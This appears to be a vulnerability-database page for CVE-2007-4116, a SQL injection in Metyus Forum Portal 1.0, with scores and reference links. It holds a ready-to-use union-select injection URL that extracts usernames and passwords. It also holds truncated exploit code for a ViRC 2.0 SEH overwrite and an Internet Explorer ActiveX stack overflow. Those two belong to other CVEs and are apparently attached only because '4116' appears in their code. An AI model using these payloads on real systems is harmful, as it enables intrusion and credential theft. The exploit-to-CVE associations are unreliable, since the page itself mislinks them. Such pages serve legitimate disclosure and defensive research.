CVE-2007-4116
Published 2007-07-31
Priority: P4 | 34 | medium | 6.8 (CVSS 2.0)
CVSS vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.10% (61.7th percentile)
SQL injection vulnerability in philboard_forum.asp in Metyus Forum Portal 1.0 allows remote attackers to execute arbitrary SQL commands via the forumid parameter. NOTE: this might be related to CVE-2007-0920 or CVE-2007-3884.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| metyus | forum_portal | — | — |
No detection rules found.
Exploit-DB
Metyus Forum Portal 1.0 - 'Philboard_Forum.asp' SQL Injection
exploitdb·2007-07-27
CVE-2007-4116 Metyus Forum Portal 1.0 - 'Philboard_Forum.asp' SQL Injection
---
source: https://www.securityfocus.com/bid/25096/info
Metyus Forum Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Metyus Forum Portal 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/philboard_forum.asp?forumid=-99+union+all+select+0,1,2%20,3,4,5,6,7,8,9,password,username,12,13,14,15,16,17,18,19,20+%20from+users
Exploit-DB
ViRC 2.0 - JOIN Response Remote Overwrite (SEH)
exploitdb·2007-07-06
CVE-2007-3612 ViRC 2.0 - JOIN Response Remote Overwrite (SEH)
---
#!/usr/bin/python
# ViRC 2.0 'JOIN Response' 0day Remote SEH Overwrite PoC Exploit
# Bug discovered by Krystian Kloskowski (h07)
# Tested on Visual IRC 2.0 / 2k SP4 Polish
# Shellcode type: Windows Execute Command (calc.exe)
# How stuff works ? ..
#
# [ViRC] -----> (..JOIN..) -------------> [exploit_tunnel] -----------------------------> [Real IRC server]
# [ViRC] <--- (#channel :AAAAAAA...) <--- [exploit_tunnel] <---- (#channel :nick) <------ [Real IRC server]
#
# Details:
# "#channel :" + "A" * 4116
# 0x41414141 Pointer to next SEH record
# 0x41414141 SE handler
##
from thread import start_new_thread
from struct import pack
from string import find
from string import join
from socket import *
LEN_RECV = 65536
in_addr = '0.0.0.0' # l
Exploit-DB
Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2)
exploitdb·2007-04-27
CVE-2007-0018 Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2)
---
Sub tryMe
'------------------------------------------------------------------
'[PoC2] IE NCTAudioFile2.AudioFile ActiveX Remote Stack Overfl0w
'original advisory: http://secunia.com/advisories/23475/
'author: shinnai
'mail: shinnai[at]autistici[dot]org
'site: http://shinnai.altervista.org
'based on: http://www.milw0rm.com/exploits/3728
'(see what InTeL said about Win XP Pro SP2 and IE7, enjoy brotha ;)
'modified for working on Win XP Pro SP2 with IE7 full patched
'------------------------------------------------------------------
buff = String (4116, "A")
get_EIP = unescape("%EB%AA%D7%77") '0x77D7AAEB call esp (from user32.dll)
nop = unescape("%90%90%90%90%90%90%90%90%90%90")
shellcode = u
No writeups or analysis indexed.
http://secunia.com/advisories/26253
http://securityreason.com/securityalert/2951
http://www.securityfocus.com/archive/1/474815/100/0/threaded
http://www.securityfocus.com/bid/25096
http://www.vupen.com/english/advisories/2007/2718
https://exchange.xforce.ibmcloud.com/vulnerabilities/35651
Published: 2007-07-31